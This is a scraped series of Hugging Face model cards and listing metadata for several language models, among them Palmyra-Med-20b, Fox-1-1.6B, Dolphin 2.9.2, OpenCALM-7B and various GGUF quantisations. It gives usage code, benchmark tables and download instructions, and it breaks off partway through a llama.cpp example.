## Model description
**Palmyra-Med-20b** is a 20 billion parameter Large Language Model that has been uptrained on
**Palmyra-Large** with a specialized custom-curated medical dataset.
The main objective of this model is to enhance performance in tasks related to medical dialogue
and question-answering.
- **Developed by:** [https://writer.com/](https://writer.com/);
- **Model type:** Causal decoder-only;
- **Language(s) (NLP):** English;
- **License:** Apache 2.0;
- **Finetuned from model:** [Palmyra-Large](https://huggingface.co/Writer/palmyra-large).
### Model Source
[Palmyra-Med: Instruction-Based Fine-Tuning of LLMs Enhancing Medical Domain Performance](https://dev.writer.com/docs/palmyra-med-instruction-based-fine-tuning-of-llms-enhancing-medical-domain-performance)
## Uses
### Out-of-Scope Use
Production use without adequate assessment of risks and mitigation; any use cases which may be considered irresponsible or harmful.
## Bias, Risks, and Limitations
Palmyra-Med-20B is mostly trained on English data, and will not generalize appropriately to other languages. Furthermore, as it is trained on a large-scale corpora representative of the web, it will carry the stereotypes and biases commonly encountered online.
### Recommendations
We recommend users of Palmyra-Med-20B to develop guardrails and to take appropriate precautions for any production use.
## Usage
The model is compatible with the huggingface `AutoModelForCausalLM` and can be easily run on a single 40GB A100.
```py
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
model_name = "Writer/palmyra-med-20b"
tokenizer = AutoTokenizer.from_pretrained(model_name, use_fast=False)
model = AutoModelForCausalLM.from_pretrained(
model_name,
device_map="auto",
torch_dtype=torch.float16,
)
prompt = "Can you explain in simple terms how vaccines help our body fight diseases?"
input_text = (
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions. "
"USER: {prompt} "
"ASSISTANT:"
)
model_inputs = tokenizer(input_text.format(prompt=prompt), return_tensors="pt").to(
"cuda"
)
gen_conf = {
"temperature": 0.7,
"repetition_penalty": 1.0,
"max_new_tokens": 512,
"do_sample": True,
}
out_tokens = model.generate(**model_inputs, **gen_conf)
response_ids = out_tokens[0][len(model_inputs.input_ids[0]) :]
output = tokenizer.decode(response_ids, skip_special_tokens=True)
print(output)
## output ##
# Vaccines stimulate the production of antibodies by the body's immune system.
# Antibodies are proteins produced by B lymphocytes in response to foreign substances,such as viruses and bacteria.
# The antibodies produced by the immune system can bind to and neutralize the pathogens, preventing them from invading and damaging the host cells.
# Vaccines work by introducing antigens, which are components of the pathogen, into the body.
# The immune system then produces antibodies against the antigens, which can recognize and neutralize the pathogen if it enters the body in the future.
# The use of vaccines has led to a significant reduction in the incidence and severity of many diseases, including measles, mumps, rubella, and polio.
```
It can also be used with text-generation-inference
```sh
model=Writer/palmyra-med-20b
volume=$PWD/data
docker run --gpus all --shm-size 1g -p 8080:80 -v $volume:/data ghcr.io/huggingface/text-generation-inference --model-id $model
```
## Dataset
For the fine-tuning of our LLMs, we used a custom-curated medical dataset that combines data from
two publicly available sources: PubMedQA (Jin et al. 2019) and MedQA (Zhang et al. 2018).The
PubMedQA dataset, which originated from the PubMed abstract database, consists of biomedical
articles accompanied by corresponding question-answer pairs. In contrast, the MedQA dataset
features medical questions and answers that are designed to assess the reasoning capabilities of
medical question-answering systems.
We prepared our custom dataset by merging and processing data from the aforementioned sources,
maintaining the dataset mixture ratios detailed in Table 1. These ratios were consistent for finetuning
both Palmyra-20b and Palmyra-40b models. Upon fine-tuning the models with this dataset, we refer
to the resulting models as Palmyra-Med-20b and Palmyra-Med-40b, respectively.
| Dataset | Ratio | Count |
| -----------|----------- | ----------- |
| PubMedQA | 75% | 150,000 |
| MedQA | 25% | 10,178 |
## Evaluation
we present the findings of our experiments, beginning with the evaluation outcomes of
the fine-tuned models and followed by a discussion of the base models’ performance on each of the
evaluation datasets. Additionally, we report the progressive improvement of the Palmyra-Med-40b
model throughout the training process on the PubMedQA dataset.
| Model | PubMedQA | MedQA |
| -----------|----------- | ----------- |
| Palmyra-20b | 49.8 | 31.2 |
| Palmyra-40b | 64.8 | 43.1|
| Palmyra-Med-20b| 75.6 | 44.6|
| Palmyra-Med-40b| 81.1 | 72.4|
## Limitation
The model may not operate efficiently beyond the confines of the healthcare field.
Since it has not been subjected to practical scenarios, its real-time efficacy and precision remain undetermined.
Under no circumstances should it replace the advice of a medical professional, and it must be regarded solely as a tool for research purposes.
## Citation and Related Information
To cite this model:
```
@misc{Palmyra-Med-20B,
author = {Writer Engineering team},
title = {{Palmyra-Large Parameter Autoregressive Language Model}},
howpublished = {\url{https://dev.writer.com}},
year = 2023,
month = March
}
```
## Contact
[email protected]
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_Writer__palmyra-med-20b)
| Metric | Value |
|-----------------------|---------------------------|
| Avg. | 40.02 |
| ARC (25-shot) | 46.93 |
| HellaSwag (10-shot) | 73.51 |
| MMLU (5-shot) | 44.34 |
| TruthfulQA (0-shot) | 35.47 |
| Winogrande (5-shot) | 65.35 |
| GSM8K (5-shot) | 2.65 |
| DROP (3-shot) | 11.88 |
|
tensoropera/Fox-1-1.6B | tensoropera | "2024-06-28T20:01:45Z" | 3,661 | 19 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-06-13T00:05:14Z" | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
---
## Model Card for Fox-1-1.6B
> [!IMPORTANT]
> This model is a base pretrained model which requires further finetuning for most use cases.
> For a more interactive experience, we
> recommend [tensoropera/Fox-1-1.6B-Instruct-v0.1](https://huggingface.co/tensoropera/Fox-1-1.6B-Instruct-v0.1), the
> instruction-tuned version of Fox-1.
Fox-1 is a decoder-only transformer-based small language model (SLM) with 1.6B total parameters developed
by [TensorOpera AI](https://tensoropera.ai/). The model was trained with a 3-stage data curriculum on 3 trillion
tokens of text and code data in 8K sequence length. Fox-1 uses Grouped Query Attention (GQA) with 4 key-value heads and
16 attention heads for faster inference.
For the full details of this model please read
our [release blog post](https://blog.tensoropera.ai/tensoropera-unveils-fox-foundation-model-a-pioneering-open-source-slm-leading-the-way-against-tech-giants).
## Benchmarks
We evaluated Fox-1 on ARC Challenge (25-shot), HellaSwag (10-shot), TruthfulQA (0-shot), MMLU (5-shot),
Winogrande (5-shot), and GSM8k (5-shot). We follow the Open LLM Leaderboard's evaluation setup and report the average
score of the 6 benchmarks. The model was evaluated on a machine with 8*H100 GPUs.
| | Fox-1-1.6B | Qwen-1.5-1.8B | Gemma-2B | StableLM-2-1.6B | OpenELM-1.1B |
|---------------|------------|---------------|----------|-----------------|--------------|
| GSM8k | 36.39% | 34.04% | 17.06% | 17.74% | 2.27% |
| MMLU | 43.05% | 47.15% | 41.71% | 39.16% | 27.28% |
| ARC Challenge | 41.21% | 37.20% | 49.23% | 44.11% | 36.26% |
| HellaSwag | 62.82% | 61.55% | 71.60% | 70.46% | 65.23% |
| TruthfulQA | 38.66% | 39.37% | 33.05% | 38.77% | 36.98% |
| Winogrande | 60.62% | 65.51% | 65.51% | 65.27% | 61.64% |
| Average | 47.13% | 46.81% | 46.36% | 45.92% | 38.28% |
|
macadeliccc/dolphin-2.9.2-Phi-3-Medium-GGUF | macadeliccc | "2024-06-20T05:20:07Z" | 3,661 | 0 | null | [
"gguf",
"en",
"dataset:cognitivecomputations/Dolphin-2.9.2",
"dataset:teknium/OpenHermes-2.5",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:cognitivecomputations/dolphin-coder",
"dataset:cognitivecomputations/samantha-data",
"dataset:microsoft/orca-math-word-problems-200k",
"dataset:internlm/Agent-FLAN",
"dataset:cognitivecomputations/SystemChat-2.0",
"base_model:unsloth/Phi-3-mini-4k-instruct",
"license:mit",
"region:us"
] | null | "2024-06-19T19:28:18Z" | ---
license: mit
language:
- en
base_model:
- unsloth/Phi-3-mini-4k-instruct
datasets:
- cognitivecomputations/Dolphin-2.9.2
- teknium/OpenHermes-2.5
- m-a-p/CodeFeedback-Filtered-Instruction
- cognitivecomputations/dolphin-coder
- cognitivecomputations/samantha-data
- microsoft/orca-math-word-problems-200k
- internlm/Agent-FLAN
- cognitivecomputations/SystemChat-2.0
---
**Original Model Card**
# Dolphin 2.9.2 Phi 3 Medium 🐬
Curated and trained by Eric Hartford, Lucas Atkins, Fernando Fernandes, and with help from the community of Cognitive Computations
[](https://discord.gg/cognitivecomputations)
Discord: https://discord.gg/cognitivecomputations
<img src="https://cdn-uploads.huggingface.co/production/uploads/63111b2d88942700629f5771/ldkN1J0WIDQwU4vutGYiD.png" width="600" />
Our appreciation for the sponsor of Dolphin 2.9.2:
- [Crusoe Cloud](https://crusoe.ai/) - provided excellent on-demand 8xL40Snode
This model is based on Phi-3-Medium-Instruct-4k, and is governed by the MIT license with which Microsoft released Phi-3.
Since Microsoft only released the fine-tuned model - Dolphin-2.9.2-Phi-3-Medium has not been entirely cleaned of refusals.
The base model has 4k context, and the qLoRA fine-tuning was with 4k sequence length.
It took 3.5 days on 8xL40S node provided by Crusoe Cloud
This model uses the ChatML prompt template.
example:
```
<|im_start|>system
You are Dolphin, a helpful AI assistant.<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant
```
Dolphin-2.9.2 has a variety of instruction, conversational, and coding skills. It also has initial agentic abilities and supports function calling.
We have filtered the dataset to remove alignment and bias. This makes the model more compliant. You are advised to implement your own alignment layer before exposing the model as a service. Please read my blog post about uncensored models. https://erichartford.com/uncensored-models You are responsible for any content you create using this model. Enjoy responsibly.

[<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
## evals:
<img src="https://i.ibb.co/jrBsPLY/file-9gw-A1-Ih-SBYU3-PCZ92-ZNb-Vci-P.png" width="600" /> |
cyberagent/open-calm-7b | cyberagent | "2023-05-18T01:12:08Z" | 3,660 | 202 | transformers | [
"transformers",
"pytorch",
"gpt_neox",
"text-generation",
"japanese",
"causal-lm",
"ja",
"dataset:wikipedia",
"dataset:cc100",
"dataset:mc4",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-05-15T07:53:34Z" | ---
license: cc-by-sa-4.0
datasets:
- wikipedia
- cc100
- mc4
language:
- ja
tags:
- japanese
- causal-lm
inference: false
---
# OpenCALM-7B
## Model Description
OpenCALM is a suite of decoder-only language models pre-trained on Japanese datasets, developed by CyberAgent, Inc.
## Usage
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
model = AutoModelForCausalLM.from_pretrained("cyberagent/open-calm-7b", device_map="auto", torch_dtype=torch.float16)
tokenizer = AutoTokenizer.from_pretrained("cyberagent/open-calm-7b")
inputs = tokenizer("AIによって私達の暮らしは、", return_tensors="pt").to(model.device)
with torch.no_grad():
tokens = model.generate(
**inputs,
max_new_tokens=64,
do_sample=True,
temperature=0.7,
top_p=0.9,
repetition_penalty=1.05,
pad_token_id=tokenizer.pad_token_id,
)
output = tokenizer.decode(tokens[0], skip_special_tokens=True)
print(output)
```
## Model Details
|Model|Params|Layers|Dim|Heads|Dev ppl|
|:---:|:---: |:---:|:---:|:---:|:---:|
|[cyberagent/open-calm-small](https://huggingface.co/cyberagent/open-calm-small)|160M|12|768|12|19.7|
|[cyberagent/open-calm-medium](https://huggingface.co/cyberagent/open-calm-medium)|400M|24|1024|16|13.8|
|[cyberagent/open-calm-large](https://huggingface.co/cyberagent/open-calm-large)|830M|24|1536|16|11.3|
|[cyberagent/open-calm-1b](https://huggingface.co/cyberagent/open-calm-1b)|1.4B|24|2048|16|10.3|
|[cyberagent/open-calm-3b](https://huggingface.co/cyberagent/open-calm-3b)|2.7B|32|2560|32|9.7|
|[cyberagent/open-calm-7b](https://huggingface.co/cyberagent/open-calm-7b)|6.8B|32|4096|32|8.2|
* **Developed by**: [CyberAgent, Inc.](https://www.cyberagent.co.jp/)
* **Model type**: Transformer-based Language Model
* **Language**: Japanese
* **Library**: [GPT-NeoX](https://github.com/EleutherAI/gpt-neox)
* **License**: OpenCALM is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License ([CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/)). When using this model, please provide appropriate credit to CyberAgent, Inc.
* Example (en): This model is a fine-tuned version of OpenCALM-XX developed by CyberAgent, Inc. The original model is released under the CC BY-SA 4.0 license, and this model is also released under the same CC BY-SA 4.0 license. For more information, please visit: https://creativecommons.org/licenses/by-sa/4.0/
* Example (ja): 本モデルは、株式会社サイバーエージェントによるOpenCALM-XXをファインチューニングしたものです。元のモデルはCC BY-SA 4.0ライセンスのもとで公開されており、本モデルも同じくCC BY-SA 4.0ライセンスで公開します。詳しくはこちらをご覧ください: https://creativecommons.org/licenses/by-sa/4.0/
## Training Dataset
* Wikipedia (ja)
* Common Crawl (ja)
## Author
[Ryosuke Ishigami](https://huggingface.co/rishigami)
## Citations
```bibtext
@software{gpt-neox-library,
title = {{GPT-NeoX: Large Scale Autoregressive Language Modeling in PyTorch}},
author = {Andonian, Alex and Anthony, Quentin and Biderman, Stella and Black, Sid and Gali, Preetham and Gao, Leo and Hallahan, Eric and Levy-Kramer, Josh and Leahy, Connor and Nestler, Lucas and Parker, Kip and Pieler, Michael and Purohit, Shivanshu and Songz, Tri and Phil, Wang and Weinbach, Samuel},
url = {https://www.github.com/eleutherai/gpt-neox},
doi = {10.5281/zenodo.5879544},
month = {8},
year = {2021},
version = {0.0.1},
}
``` |
mradermacher/MD-Judge-German-v0.1-GGUF | mradermacher | "2024-06-14T21:06:03Z" | 3,659 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:felfri/MD-Judge-German-v0.1",
"endpoints_compatible",
"region:us"
] | null | "2024-06-14T19:39:37Z" | ---
base_model: felfri/MD-Judge-German-v0.1
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/felfri/MD-Judge-German-v0.1
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/Writing_Partner_Mistral_7B-GGUF | mradermacher | "2024-06-11T15:02:37Z" | 3,658 | 0 | transformers | [
"transformers",
"gguf",
"mistral",
"instruct",
"finetune",
"chatml",
"gpt4",
"en",
"base_model:FPHam/Writing_Partner_Mistral_7B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-11T10:58:50Z" | ---
base_model: FPHam/Writing_Partner_Mistral_7B
language:
- en
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- mistral
- instruct
- finetune
- chatml
- gpt4
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FPHam/Writing_Partner_Mistral_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Ganeshkumar34/llama3-8b-kovaion_cpp | Ganeshkumar34 | "2024-06-26T11:32:01Z" | 3,656 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/llama-3-8b-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-25T07:04:21Z" | ---
base_model: unsloth/llama-3-8b-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** Ganeshkumar34
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
roneneldan/TinyStories-3M | roneneldan | "2023-05-17T22:11:46Z" | 3,653 | 2 | transformers | [
"transformers",
"pytorch",
"gpt_neo",
"text-generation",
"arxiv:2305.07759",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2023-05-12T21:46:51Z" | Model trained on the TinyStories Dataset, see https://arxiv.org/abs/2305.07759
------ EXAMPLE USAGE ---
from transformers import AutoModelForCausalLM, AutoTokenizer, GenerationConfig
model = AutoModelForCausalLM.from_pretrained('roneneldan/TinyStories-3M')
tokenizer = AutoTokenizer.from_pretrained("EleutherAI/gpt-neo-125M")
prompt = "Once upon a time there was"
input_ids = tokenizer.encode(prompt, return_tensors="pt")
# Generate completion
output = model.generate(input_ids, max_length = 1000, num_beams=1)
# Decode the completion
output_text = tokenizer.decode(output[0], skip_special_tokens=True)
# Print the generated text
print(output_text) |
akreal/tiny-random-LlamaForCausalLM | akreal | "2023-04-19T21:39:04Z" | 3,652 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-07-26T23:07:36Z" | ---
duplicated_from: HuggingFaceM4/tiny-random-LlamaForCausalLM
---
|
PrunaAI/internlm-internlm2-1_8b-GGUF-smashed | PrunaAI | "2024-06-28T22:20:00Z" | 3,651 | 0 | null | [
"gguf",
"pruna-ai",
"region:us"
] | null | "2024-06-28T22:09:06Z" | ---
thumbnail: "https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"
metrics:
- memory_disk
- memory_inference
- inference_latency
- inference_throughput
- inference_CO2_emissions
- inference_energy_consumption
tags:
- pruna-ai
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<a href="https://www.pruna.ai/" target="_blank" rel="noopener noreferrer">
<img src="https://i.imgur.com/eDAlcgk.png" alt="PrunaAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</a>
</div>
<!-- header end -->
[](https://twitter.com/PrunaAI)
[](https://github.com/PrunaAI)
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
[](https://discord.com/invite/vb6SmA3hxu)
## This repo contains GGUF versions of the internlm/internlm2-1_8b model.
# Simply make AI models cheaper, smaller, faster, and greener!
- Give a thumbs up if you like this model!
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
- Read the documentations to know more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/)
- Join Pruna AI community on Discord [here](https://discord.com/invite/vb6SmA3hxu) to share feedback/suggestions or get help.
**Frequently Asked Questions**
- ***How does the compression work?*** The model is compressed with GGUF.
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
- ***What is the model format?*** We use GGUF format.
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use-cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
# Downloading and running the models
You can download the individual files from the Files & versions section. Here is a list of the different versions we provide. For more info checkout [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):
| Quant type | Description |
|------------|--------------------------------------------------------------------------------------------|
| Q5_K_M | High quality, recommended. |
| Q5_K_S | High quality, recommended. |
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
| Q3_K_M | Even lower quality. |
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| Q3_K_S | Low quality, not recommended. |
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| Q2_K | Very low quality but surprisingly usable. |
## How to download GGUF files ?
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
* LM Studio
* LoLLMS Web UI
* Faraday.dev
- **Option A** - Downloading in `text-generation-webui`:
- **Step 1**: Under Download Model, you can enter the model repo: internlm-internlm2-1_8b-GGUF-smashed and below it, a specific filename to download, such as: phi-2.IQ3_M.gguf.
- **Step 2**: Then click Download.
- **Option B** - Downloading on the command line (including multiple files at once):
- **Step 1**: We recommend using the `huggingface-hub` Python library:
```shell
pip3 install huggingface-hub
```
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed internlm2-1_8b.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage (click to read)</summary>
Alternatively, you can also download multiple files at once with a pattern:
```shell
huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
```shell
pip3 install hf_transfer
```
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
```shell
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed internlm2-1_8b.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->
<!-- README_GGUF.md-how-to-run start -->
## How to run model in GGUF format?
- **Option A** - Introductory example with `llama.cpp` command
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
```shell
